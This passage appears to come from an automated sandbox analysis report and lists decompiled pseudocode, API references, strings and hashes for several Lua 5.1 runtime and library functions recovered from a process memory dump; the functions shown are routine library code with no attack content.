						asm("fild dword [esp+0x10]");
						_t46 = _t41 - 8;
						 *_t46 = __fp0;
						_push(_t36);
						L00994B5A();
						_push( *_t32);
						_push(_t36);
						L00994AD0();
						_push(0xfffffffd);
						_push(_t36);
						L00994B42();
						_t17 =  *((intOrPtr*)(_t32 + 4));
						_t32 = _t32 + 4;
						_t41 = _t46 + 0x1c;
						_v12 = _v12 + 1;
					} while (_t17 != 0);
				}
				_push(_v8);
				_push(_t36);
				L00994B42();
				_push(0);
				_push(0);
				_push(_t36);
				_v12 = 1;
				L00994ACA();
				_t33 =  *((intOrPtr*)(_t20 + 0xc));
				_t42 = _t41 + 0x14;
				if(_t33 != 0 &&  *_t33 != 0) {
					do {
						asm("fild dword [esp+0x10]");
						_t44 = _t42 - 8;
						 *_t44 = _t53;
						_push(_t36);
						L00994B5A();
						_t18 =  *_t33;
						_push( *_t18);
						L00994A10();
						_push(_t18);
						_push(_t36);
						L00994AD0();
						_push(0xfffffffd);
						_push(_t36);
						L00994B42();
						_t17 =  *((intOrPtr*)(_t33 + 4));
						_t33 = _t33 + 4;
						_t42 = _t44 + 0x1c;
						_v16 = _v16 + 1;
					} while (_t17 != 0);
				}
				_push(_v8);
				_push(_t36);
				L00994B42();
				return _t17;
			}

0x00991650
0x0099165b
0x0099165f
0x00991661
0x00991663
0x00991664
0x00991669
0x0099166a
0x00991671
0x00991676
0x00991677
0x0099167b
0x00991680
0x00991683
0x00991685
0x00991686
0x00991687
0x0099168c
0x0099168d
0x0099168e
0x00991693
0x00991698
0x00991699
0x0099169e
0x009916a3
0x009916a4
0x009916a9
0x009916ac
0x009916ae
0x009916b0
0x009916b1
0x009916b9
0x009916be
0x009916c3
0x009916ca
0x009916ca
0x009916ce
0x009916d1
0x009916d4
0x009916d5
0x009916dc
0x009916dd
0x009916de
0x009916e3
0x009916e5
0x009916e6
0x009916ef
0x009916f2
0x009916f5
0x009916fb
0x009916fb
0x009916ca
0x00991705
0x00991706
0x00991707
0x0099170c
0x0099170e
0x00991710
0x00991711
0x00991719
0x0099171e
0x00991721
0x00991726
0x0099172d
0x0099172d
0x00991731
0x00991734
0x00991737
0x00991738
0x0099173d
0x00991744
0x00991745
0x0099174a
0x0099174b
0x0099174c
0x00991751
0x00991753
0x00991754
0x0099175d
0x00991760
0x00991763
0x00991769
0x00991769
0x0099172d
0x00991773
0x00991774
0x00991775
0x00991783

APIs

lua_createtable.LUA5.1(?,00000000,00000000), ref: 00991664
lua_gettop.LUA5.1(?,?,00000000,00000000), ref: 0099166A
lua_pushstring.LUA5.1(?,name,?,?,00000000,00000000), ref: 0099167B
lua_pushstring.LUA5.1(?,00000000,?,name,?,?,00000000,00000000), ref: 00991687
lua_settable.LUA5.1(?,00000000,?,00000000,?,name,?,?,00000000,00000000), ref: 0099168E
lua_pushstring.LUA5.1(?,009960F8,?,00000000,?,00000000,?,name,?,?,00000000,00000000), ref: 00991699
lua_pushstring.LUA5.1(?,alias,?,009960F8,?,00000000,?,00000000,?,name,?,?,00000000,00000000), ref: 009916A4
lua_createtable.LUA5.1 ref: 009916B9
lua_pushnumber.LUA5.1(?), ref: 009916D5
lua_pushstring.LUA5.1(?,?,?), ref: 009916DE
lua_settable.LUA5.1(?,000000FD,?,?,?), ref: 009916E6
lua_settable.LUA5.1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00991707
lua_createtable.LUA5.1 ref: 00991719
lua_pushnumber.LUA5.1(?,?,?,?,?,00000000,?,?), ref: 00991738
inet_ntoa.WSOCK32 ref: 00991745
lua_pushstring.LUA5.1(?,00000000,?,?,?,?,?,?,?,00000000,?,?), ref: 0099174C
lua_settable.LUA5.1(?,000000FD,?,00000000,?,?,?,?,?,?,?,00000000,?,?), ref: 00991754
lua_settable.LUA5.1(?,?,?,00000000,00000000,?,?), ref: 00991775

Strings

name, xrefs: 00991671
alias, xrefs: 0099169E

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushstring.$lua_settable.$lua_createtable.$lua_pushnumber.$inet_ntoalua_gettop.
String ID: alias$name
API String ID: 3648022753-1124982520
Opcode ID: 232660cd62567966eb79db889d28254e0260afa8f75990d3f304d1c666cc1457
Instruction ID: 264239e6cc1777625a136eec42bfb11450288dda0eff8ba52d1d7469ebc5a6f5
Opcode Fuzzy Hash: 232660cd62567966eb79db889d28254e0260afa8f75990d3f304d1c666cc1457
Instruction Fuzzy Hash: 2F31D0715466026BDA12BF5C8C42F6FB3A8EFC5304F204614F95457282EB71E91286EE

Uniqueness

Uniqueness Score: -1.00%

Function 009923E0, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E009923E0(void* __eax, void* __fp0, intOrPtr _a4, intOrPtr _a8) {
				char _v524;
				void* _v528;
				char* _t19;
				intOrPtr* _t21;
				intOrPtr* _t24;
				intOrPtr _t26;
				intOrPtr _t31;
				intOrPtr* _t37;
				intOrPtr _t38;
				void* _t39;

				_t38 = _a4;
				_push(_t38);
				L00994B60();
				_t39 = __eax;
				_t19 =  &_v528;
				_push(_t19);
				_push(0x996c90);
				_push(3);
				_push(_t38);
				L00994B78();
				_t26 = _a8;
				E00992DC0(__fp0,  *((intOrPtr*)(_t26 + 0x14)));
				_push( &_v524);
				_push(_t38);
				L00994BA2();
				_t21 = _v528;
				_push(_t21);
				_push(_t19);
				_push( &_v524);
				L00994B9C();
				_push(2);
				_push(_t38);
				L00994B84();
				if(_t21 != 0) {
					_push( &_v524);
					_push(2);
					L00994B7E();
					L00994BD0();
					__eflags = _t21 - _v528;
					_t21 = E009925C0(_t26, _t21 - _v528, _t38);
					goto L11;
				} else {
					_push(_t21);
					_push("*l");
					_push(2);
					_push(_t38);
					L00994B78();
					_t31 =  *_t21;
					if(_t31 != 0x2a) {
						L7:
						_push("invalid receive pattern");
						_push(2);
						_push(_t38);
						L00994B2A();
						goto L8;
					} else {
						_t49 =  *((char*)(_t21 + 1)) - 0x6c;
						if( *((char*)(_t21 + 1)) != 0x6c) {
							__eflags = _t31 - 0x2a;
							if(_t31 != 0x2a) {
								goto L7;
							} else {
								__eflags =  *((char*)(_t21 + 1)) - 0x61;
								if( *((char*)(_t21 + 1)) != 0x61) {
									goto L7;
								} else {
									_t21 = E00992630(_t26,  &_v524);
									goto L11;
								}
							}
						} else {
							_t21 = E00992690(_t49, _t26,  &_v524);
							L11:
							_t37 = _t21;
							if(_t37 == 0) {
								L8:
								_push( &_v524);
								L00994B96();
								_push(_t38);
								L00994B4E();
								_push(_t38);
								L00994B4E();
							} else {
								L00994B96();
								_t24 =  *((intOrPtr*)(_t26 + 0x10));
								_t21 =  *((intOrPtr*)(_t24 + 0xc))( *_t24, _t37,  &_v524);
								_push(_t21);
								_push(_t38);
								L00994AD0();
								_push(0xfffffffe);
								_push(_t38);
								L00994B90();
								_push(_t38);
								L00994B4E();
								_push(0xfffffffc);
								_push(_t38);
								L00994B8A();
							}
						}
					}
				}
				_push(_t38);
				L00994B60();
				return _t21 - _t39;
			}

0x009923e9
0x009923f1
0x009923f2
0x009923f7
0x009923f9
0x009923fd
0x009923fe
0x00992403
0x00992405
0x00992406
0x0099240b
0x00992418
0x00992421
0x00992422
0x00992423
0x00992428
0x00992430
0x00992431
0x00992432
0x00992433
0x00992438
0x0099243a
0x0099243b
0x00992445
0x009924d7
0x009924d8
0x009924db
0x009924e3
0x009924e8
0x009924ee
0x00000000
0x0099244b
0x0099244b
0x0099244c
0x00992451
0x00992453
0x00992454
0x00992459
0x00992461
0x00992494
0x00992494
0x00992499
0x0099249b
0x0099249c
0x00000000
0x00992463
0x00992463
0x00992467
0x00992479
0x0099247c
0x00000000
0x0099247e
0x0099247e
0x00992482
0x00000000
0x00992484
0x0099248a
0x00000000
0x0099248f
0x00992482
0x00992469
0x0099246f
0x009924f6
0x009924f6
0x009924fa
0x009924a4
0x009924a8
0x009924a9
0x009924ae
0x009924af
0x009924b4
0x009924b5
0x009924fc
0x00992501
0x00992506
0x0099250d
0x00992510
0x00992511
0x00992512
0x00992517
0x00992519
0x0099251a
0x0099251f
0x00992520
0x00992525
0x00992527
0x00992528
0x0099252d
0x009924fa
0x00992467
0x00992461
0x009924bd
0x009924be
0x009924d2

APIs

lua_gettop.LUA5.1(?,?,?), ref: 009923F2
luaL_optlstring.LUA5.1(?,00000003,00996C90,?,?,?,?), ref: 00992406
luaL_buffinit.LUA5.1(?,?,?,?,00000003,00996C90,?,?,?,?), ref: 00992423
luaL_addlstring.LUA5.1(?,00000000,?,?,?,?,?,00000003,00996C90,?,?,?,?), ref: 00992433
lua_isnumber.LUA5.1(?,00000002,?,00000000,?,?,?,?,?,00000003,00996C90,?,?,?,?), ref: 0099243B
luaL_optlstring.LUA5.1(?,00000002,00996368,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00992454
luaL_argerror.LUA5.1(?,00000002,invalid receive pattern), ref: 0099249C
luaL_pushresult.LUA5.1(?,?,?,?,?,?), ref: 009924A9
lua_pushnil.LUA5.1(?,?,?,?,?,?,?), ref: 009924AF
lua_pushnil.LUA5.1(?,?,?,?,?,?,?,?), ref: 009924B5

Part of subcall function 00992690: luaL_prepbuffer.LUA5.1(?,00992474,?,?), ref: 009926D7

lua_gettop.LUA5.1(?,?,?,?,?,?,?,?,?), ref: 009924BE
lua_tonumber.LUA5.1(?,00000002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009924DB
_ftol.MSVCRT ref: 009924E3
luaL_pushresult.LUA5.1(?,?,?,?,?,?), ref: 00992501
lua_pushstring.LUA5.1(?,00000000,?,00000000,?,?,?,?,?,?), ref: 00992512
lua_pushvalue.LUA5.1(?,000000FE,?,00000000,?,00000000,?,?,?,?,?,?), ref: 0099251A
lua_pushnil.LUA5.1(?,?,000000FE,?,00000000,?,00000000,?,?,?,?,?,?), ref: 00992520
lua_replace.LUA5.1(?,000000FC,?,?,000000FE,?,00000000,?,00000000,?,?,?,?,?,?), ref: 00992528

Strings

invalid receive pattern, xrefs: 00992494

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushnil.$L_optlstring.L_pushresult.lua_gettop.$L_addlstring.L_argerror.L_buffinit.L_prepbuffer._ftollua_isnumber.lua_pushstring.lua_pushvalue.lua_replace.lua_tonumber.
String ID: invalid receive pattern
API String ID: 3068233321-3558494022
Opcode ID: 1151f91ab37b3edf0c397fe4fe90147e31d3fe83fdc1c0acdf7113e5d21a090e
Instruction ID: 9d04c4d53d4459b667d98d1b6b772de95663be6a64f94ec955e3936da5ec8254
Opcode Fuzzy Hash: 1151f91ab37b3edf0c397fe4fe90147e31d3fe83fdc1c0acdf7113e5d21a090e
Instruction Fuzzy Hash: 1831C2B25053103BEE12FB2CAC47FAF739D9FC6715F044918F94466183EA29DA1A42B7

Uniqueness

Uniqueness Score: -1.00%

Function 00A22CB0, Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00A22CB0(void* __eax, void* __fp0, intOrPtr _a4) {
				void* _v8;
				void* _t10;
				void* _t16;
				void* _t18;
				void* _t23;
				intOrPtr _t26;
				void** _t28;
				void** _t29;
				void** _t30;
				void** _t31;
				void* _t41;

				_t41 = __fp0;
				_t10 = __eax;
				_t26 = _a4;
				_push(1);
				_push(_t26);
				L00A23F4A();
				_t28 =  &(( &_v8)[2]);
				if(__eax != 4) {
					_push(1);
					_push(_t26);
					L00A23F4A();
					_t29 =  &(_t28[2]);
					if(__eax != 2) {
						_push(0x200);
						_push(1);
						_push(_t26);
						_t18 = 0;
						L00A23FC2();
						_t30 =  &(_t29[3]);
						goto L5;
					} else {
						_push("alien_buffer");
						_push(0xffffd8f0);
						_push(_t26);
						L00A23F02();
						_push(0xfffffffe);
						_push(_t26);
						L00A23F1A();
						return 1;
					}
				} else {
					_t16 =  &_v8;
					_push(_t16);
					_push(1);
					_push(_t26);
					L00A23F5C();
					_t18 = _t16;
					_t30 =  &(_t28[3]);
					_t10 = _v8 + 1;
					L5:
					_push(_t10);
					_push(_t26);
					_v8 = _t10;
					L00A23F2C();
					_t23 = _t10;
					_t31 =  &(_t30[2]);
					if(_t23 == 0) {
						_push("cannot allocate buffer");
						_push(_t26);
						L00A23F26();
						return 0;
					} else {
						if(_t18 != 0) {
							memcpy(_t23, _t18, _v8 + 0xffffffff);
							_t31 =  &(_t31[3]);
							 *((char*)(_t23 + _v8 - 1)) = 0;
						}
						_push(0);
						_push(0);
						_push(_t26);
						L00A23FBC();
						asm("fild dword [esp+0x18]");
						if(_v8 < 0) {
							_t41 = _t41 +  *0xa25878;
						}
						_t31[1] = _t41;
						_push(_t26);
						L00A23F80();
						_push("size");
						_push(0xfffffffe);
						_push(_t26);
						L00A23F3E();
						_push(0xfffffffe);
						_push(_t26);
						L00A23FB6();
						_push("alien_buffer");
						_push(0xffffd8f0);
						_push(_t26);
						L00A23F02();
						_push(0xfffffffe);
						_push(_t26);
						L00A23F1A();
						return 1;
					}
				}
			}

0x00a22cb0
0x00a22cb0
0x00a22cb5
0x00a22cb9
0x00a22cbb
0x00a22cbc
0x00a22cc1
0x00a22cc7
0x00a22ce4
0x00a22ce6
0x00a22ce7
0x00a22cec
0x00a22cf2
0x00a22d1a
0x00a22d1f
0x00a22d21
0x00a22d22
0x00a22d24
0x00a22d29
0x00000000
0x00a22cf4
0x00a22cf4
0x00a22cf9
0x00a22cfe
0x00a22cff
0x00a22d04
0x00a22d06
0x00a22d07
0x00a22d19
0x00a22d19
0x00a22cc9
0x00a22cc9
0x00a22ccd
0x00a22cce
0x00a22cd0
0x00a22cd1
0x00a22cd6
0x00a22cdc
0x00a22cdf
0x00a22d2c
0x00a22d2d
0x00a22d2e
0x00a22d2f
0x00a22d33
0x00a22d38
0x00a22d3a
0x00a22d3f
0x00a22dc8
0x00a22dcd
0x00a22dce
0x00a22dde
0x00a22d45
0x00a22d47
0x00a22d53
0x00a22d5c
0x00a22d5f
0x00a22d5f
0x00a22d64
0x00a22d66
0x00a22d68
0x00a22d69
0x00a22d6e
0x00a22d78
0x00a22d7a
0x00a22d7a
0x00a22d83
0x00a22d86
0x00a22d87
0x00a22d8c
0x00a22d91
0x00a22d93
0x00a22d94
0x00a22d99
0x00a22d9b
0x00a22d9c
0x00a22da1
0x00a22da6
0x00a22dab
0x00a22dac
0x00a22db1
0x00a22db3
0x00a22db4
0x00a22dc7
0x00a22dc7
0x00a22d3f

APIs

lua_type.LUA5.1(?,00000001), ref: 00A22CBC
lua_tolstring.LUA5.1(?,00000001,?), ref: 00A22CD1
lua_type.LUA5.1(?,00000001), ref: 00A22CE7
lua_getfield.LUA5.1(?,FFFFD8F0,alien_buffer), ref: 00A22CFF
lua_setmetatable.LUA5.1(?,000000FE,?,FFFFD8F0,alien_buffer), ref: 00A22D07
lua_newuserdata.LUA5.1(?,00000000), ref: 00A22D33
memcpy.MSVCR80 ref: 00A22D53
lua_createtable.LUA5.1(?,00000000,00000000), ref: 00A22D69
lua_pushnumber.LUA5.1(?,00000000), ref: 00A22D87
lua_setfield.LUA5.1(?,000000FE,size,?,00000000), ref: 00A22D94
lua_setfenv.LUA5.1(?,000000FE,?,000000FE,size,?,00000000), ref: 00A22D9C
lua_getfield.LUA5.1(?,FFFFD8F0,alien_buffer,?,000000FE,?,000000FE,size,?,00000000), ref: 00A22DAC
lua_setmetatable.LUA5.1(?,000000FE,?,FFFFD8F0,alien_buffer,?,000000FE,?,000000FE,size,?,00000000), ref: 00A22DB4
luaL_error.LUA5.1(?,cannot allocate buffer), ref: 00A22DCE

Strings

alien_buffer, xrefs: 00A22CF4, 00A22DA1
cannot allocate buffer, xrefs: 00A22DC8
size, xrefs: 00A22D8C

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_getfield.lua_setmetatable.lua_type.$L_error.lua_createtable.lua_newuserdata.lua_pushnumber.lua_setfenv.lua_setfield.lua_tolstring.memcpy
String ID: alien_buffer$cannot allocate buffer$size
API String ID: 406260544-1247213693
Opcode ID: f2e2d4da60783849fe197221ff23203796a0ed48331c5abcc069216192f0c84d
Instruction ID: 0bbcc337e1cf7dfc673e114d9b9ad8643dd165c4525ce632fd2e59b183e0f898
Opcode Fuzzy Hash: f2e2d4da60783849fe197221ff23203796a0ed48331c5abcc069216192f0c84d
Instruction Fuzzy Hash: 0421F772D5963136DD10762C7F83F9F326A9F52721F240734F910692C2E65D9A0942FB

Uniqueness

Uniqueness Score: -1.00%

Function 10016920, Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E10016920(void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4) {
				void* _t6;
				void* _t8;
				void* _t17;
				void* _t22;
				intOrPtr _t26;
				void* _t27;
				void* _t28;
				void* _t32;

				_t34 = __eflags;
				_t22 = __ecx;
				_t26 = _a4;
				_t21 = E1000F4A0(__eflags, _t26, 1, 0);
				_t24 = E10001150(_t26) + 1;
				E10001B90(_t22, _t34, _t26, 0xffffd8f0, "_LOADED");
				E10001B90(_t22, _t34, _t26, E10001150(_t26) + 1, _t2);
				_t6 = E10001410(_t34, _t26, 0xffffffff);
				_t28 = _t27 + 0x30;
				_t35 = _t6 - 5;
				if(_t6 == 5) {
					L4:
					E10001B90(_t22, __eflags, _t26, 0xffffffff, "_NAME");
					_t8 = E10001410(__eflags, _t26, 0xffffffff);
					__eflags = _t8;
					_push(0xfffffffe);
					_push(_t26);
					if(_t8 == 0) {
						E10001160();
						E10016A90(__eflags, _t26, _t21);
					} else {
						E10001160();
					}
					E100013D0(__eflags, _t26, 0xffffffff);
					E10016A00(_t26);
					E10016A50(_t26, _t24 - 1);
					__eflags = 0;
					return 0;
				} else {
					E10001160(_t26, 0xfffffffe);
					_t17 = E1000F900(_t22, _t35, __fp0, _t26, 0xffffd8ee, _t21, 1);
					_t32 = _t28 + 0x18;
					if(_t17 == 0) {
						E100013D0(__eflags, _t26, 0xffffffff);
						E10001DD0(_t22, __eflags, _t26, _t24, _t21);
						_t28 = _t32 + 0x14;
						goto L4;
					} else {
						return E1000F230(_t26, "name conflict for module \'%s\'", _t21);
					}
				}
			}

0x10016920
0x10016920
0x10016922
0x10016932
0x10016946
0x10016947
0x1001694f
0x10016957
0x1001695c
0x1001695f
0x10016962
0x100169a7
0x100169af
0x100169b7
0x100169bf
0x100169c1
0x100169c3
0x100169c4
0x100169d0
0x100169d7
0x100169c6
0x100169c6
0x100169cb
0x100169e2
0x100169e8
0x100169f0
0x100169f8
0x100169fd
0x10016964
0x10016967
0x10016975
0x1001697a
0x1001697f
0x10016997
0x1001699f
0x100169a4
0x00000000
0x10016981
0x10016993
0x10016993
0x1001697f

APIs

luaL_checklstring.LUA5.1(?,00000001,00000000), ref: 1001692C

Part of subcall function 1000F4A0: lua_tolstring.LUA5.1(?,?,?,?,?,?,1000F292,?,?,00000000), ref: 1000F4B2

lua_gettop.LUA5.1(?,?,00000001,00000000), ref: 10016934
lua_getfield.LUA5.1(?,FFFFD8F0,_LOADED,?,?,00000001,00000000), ref: 10016947

Part of subcall function 10001B90: luaS_newlstr.LUA5.1(?,?,?,?,?), ref: 10001BBA

lua_getfield.LUA5.1(?,00000001,00000000,?,FFFFD8F0,_LOADED,?,?,00000001,00000000), ref: 1001694F
lua_type.LUA5.1(?,000000FF,?,00000001,00000000,?,FFFFD8F0,_LOADED,?,?,00000001,00000000), ref: 10016957
lua_settop.LUA5.1(?,000000FE), ref: 10016967
luaL_findtable.LUA5.1(?,FFFFD8EE,00000000,00000001,?,000000FE), ref: 10016975

Part of subcall function 1000F900: lua_pushvalue.LUA5.1(?,?,?,?,?,?,1000F747,?,FFFFD8F0,_LOADED,00000000,?), ref: 1000F90E
Part of subcall function 1000F900: strchr.MSVCRT ref: 1000F91D
Part of subcall function 1000F900: lua_pushlstring.LUA5.1(?,?,00000000), ref: 1000F941
Part of subcall function 1000F900: lua_rawget.LUA5.1(?,000000FE,?,?,00000000), ref: 1000F949
Part of subcall function 1000F900: lua_type.LUA5.1(?,000000FF,?,000000FE,?,?,00000000), ref: 1000F951
Part of subcall function 1000F900: lua_settop.LUA5.1(?,000000FE), ref: 1000F960
Part of subcall function 1000F900: lua_createtable.LUA5.1(?,00000000,00000001), ref: 1000F97B
Part of subcall function 1000F900: lua_pushlstring.LUA5.1(?,00000001,?,?,00000000,00000001), ref: 1000F983
Part of subcall function 1000F900: lua_pushvalue.LUA5.1(?,000000FE,?,00000001,?,?,00000000,00000001), ref: 1000F98B
Part of subcall function 1000F900: lua_settable.LUA5.1(?,000000FC,?,000000FE,?,00000001,?,?,00000000,00000001), ref: 1000F993
Part of subcall function 1000F900: lua_type.LUA5.1(?,000000FF), ref: 1000F9A0
Part of subcall function 1000F900: lua_remove.LUA5.1(?,000000FE), ref: 1000F9B0
Part of subcall function 1000F900: lua_settop.LUA5.1(?,000000FD), ref: 1000F9C9

luaL_error.LUA5.1(?,name conflict for module '%s',00000000), ref: 10016988

Part of subcall function 1000F230: luaL_where.LUA5.1(?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F238
Part of subcall function 1000F230: lua_pushvfstring.LUA5.1(?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F248
Part of subcall function 1000F230: lua_concat.LUA5.1(?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F250
Part of subcall function 1000F230: lua_error.LUA5.1(?,?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F256

lua_pushvalue.LUA5.1(?,000000FF), ref: 10016997
lua_setfield.LUA5.1(?,00000001,00000000,?,000000FF), ref: 1001699F
lua_getfield.LUA5.1(?,000000FF,_NAME), ref: 100169AF
lua_type.LUA5.1(?,000000FF,?,000000FF,_NAME), ref: 100169B7
lua_settop.LUA5.1(?,000000FE), ref: 100169C6
lua_settop.LUA5.1(?,000000FE), ref: 100169D0
lua_pushvalue.LUA5.1(?,000000FF), ref: 100169E2

Strings

name conflict for module '%s', xrefs: 10016982
_LOADED, xrefs: 10016939
_NAME, xrefs: 100169A7

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_settop.$lua_pushvalue.lua_type.$lua_getfield.$lua_pushlstring.$L_checklstring.L_error.L_findtable.L_where.S_newlstr.lua_concat.lua_createtable.lua_error.lua_gettop.lua_pushvfstring.lua_rawget.lua_remove.lua_setfield.lua_settable.lua_tolstring.strchr
String ID: _LOADED$_NAME$name conflict for module '%s'
API String ID: 882642402-1332549222
Opcode ID: e57364b9063123a195cbdc1bd9bc41f098a09a3dd845fc5a15b0bf25d3225163
Instruction ID: 579df0142cc10a132d09dcfdf21c6782c71730694d8136a8e43dfd1b19b7c34c
Opcode Fuzzy Hash: e57364b9063123a195cbdc1bd9bc41f098a09a3dd845fc5a15b0bf25d3225163
Instruction Fuzzy Hash: 6E1121AD90A52435B502E2692C42FEF214DCF876F8F600321F525751DBEB15BA9250FB

Uniqueness

Uniqueness Score: -1.00%

Function 10010B60, Relevance: 31.6, APIs: 13, Strings: 5, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E10010B60(void* __ebx, void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4) {
				void* _t5;
				signed int _t7;
				void* _t16;

				_t16 = __ecx;
				_t17 = _a4;
				E1000F470(__ebx, __eflags, _a4, 1);
				_t5 = E1000F690(__fp0, _a4, 1, "__tostring");
				_t26 = _t5;
				if(_t5 != 0) {
					L10:
					return 1;
				} else {
					_t7 = E10001410(_t26, _t17, 1);
					if(_t7 > 4) {
						L9:
						_push(E10001860(__eflags, _t17, 1));
						_push(E10001410(__eflags, _t17, 1));
						E100019F0(_t17, "%s: %p", E10001440(_t17));
						goto L10;
					} else {
						switch( *((intOrPtr*)(_t7 * 4 +  &M10010C40))) {
							case 0:
								E10001930(__esi, "nil", 3) = 1;
								return 1;
								goto L11;
							case 1:
								__eflags = E100016C0(__eflags, __esi, 1);
								__eax = 0x100192f0;
								if(__eflags == 0) {
									__eax = 0x10019334;
								}
								__eax = 1;
								return 1;
								goto L11;
							case 2:
								goto L9;
							case 3:
								E10001980(_t16, _t17, E100016F0(_t27, _t17, 1, 0));
								return 1;
								goto L11;
							case 4:
								E100013D0(__eflags, __esi, 1) = 1;
								return 1;
								goto L11;
						}
					}
				}
				L11:
			}

0x10010b60
0x10010b61
0x10010b68
0x10010b75
0x10010b7d
0x10010b7f
0x10010c37
0x10010c3d
0x10010b85
0x10010b88
0x10010b93
0x10010c0a
0x10010c15
0x10010c1e
0x10010c2f
0x00000000
0x10010b95
0x10010b95
0x00000000
0x10010c03
0x10010c09
0x00000000
0x00000000
0x10010bd4
0x10010bd6
0x10010bdb
0x10010bdd
0x10010bdd
0x10010bec
0x10010bf2
0x00000000
0x00000000
0x00000000
0x00000000
0x10010ba8
0x10010bb6
0x00000000
0x00000000
0x10010bc2
0x10010bc8
0x00000000
0x00000000
0x10010b95
0x10010b93
0x00000000

APIs

luaL_checkany.LUA5.1(?,00000001), ref: 10010B68

Part of subcall function 1000F470: lua_type.LUA5.1(?,?), ref: 1000F47C
Part of subcall function 1000F470: luaL_argerror.LUA5.1(?,?,value expected), ref: 1000F490

luaL_callmeta.LUA5.1(?,00000001,__tostring,?,00000001), ref: 10010B75

Part of subcall function 1000F690: lua_gettop.LUA5.1(?), ref: 1000F6A7
Part of subcall function 1000F690: luaL_getmetafield.LUA5.1(?,?,?), ref: 1000F6BA

lua_type.LUA5.1(?,00000001), ref: 10010B88
lua_tolstring.LUA5.1(?,00000001,00000000), ref: 10010BA1
lua_pushstring.LUA5.1(?,00000000,?,00000001,00000000), ref: 10010BA8
lua_pushvalue.LUA5.1(?,00000001), ref: 10010BBA
lua_toboolean.LUA5.1(?,00000001), ref: 10010BCC
lua_pushstring.LUA5.1(?,true), ref: 10010BE4
lua_pushlstring.LUA5.1(?,nil,00000003), ref: 10010BFB
lua_topointer.LUA5.1(?,00000001), ref: 10010C0D
lua_type.LUA5.1(?,00000001,00000000), ref: 10010C19
lua_typename.LUA5.1(?,00000000,?,00000001,00000000), ref: 10010C20
lua_pushfstring.LUA5.1(?,%s: %p,00000000,?,?,?,00000000), ref: 10010C2F

Strings

false, xrefs: 10010BDD
%s: %p, xrefs: 10010C29
nil, xrefs: 10010BF5
__tostring, xrefs: 10010B6D
true, xrefs: 10010BD6, 10010BE2

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_type.$lua_pushstring.$L_argerror.L_callmeta.L_checkany.L_getmetafield.lua_gettop.lua_pushfstring.lua_pushlstring.lua_pushvalue.lua_toboolean.lua_tolstring.lua_topointer.lua_typename.
String ID: %s: %p$__tostring$false$nil$true
API String ID: 3406855388-3663562000
Opcode ID: a10f346bd1384cbe5aba52d55bd11cd4261f5eda682edd3066e1fd325cdd8b5f
Instruction ID: 3a3e771824548914504e4b98f3fabe919622e9345f449abdc7be2c86a19e4816
Opcode Fuzzy Hash: a10f346bd1384cbe5aba52d55bd11cd4261f5eda682edd3066e1fd325cdd8b5f
Instruction Fuzzy Hash: AC11FE69A6552036F911E2187C43FEE114DCF127C9F054060F944AD18BEAEBABD201EA

Uniqueness

Uniqueness Score: -1.00%

Function 10011000, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10011000(void* __eflags, intOrPtr _a4) {
				void* _t16;

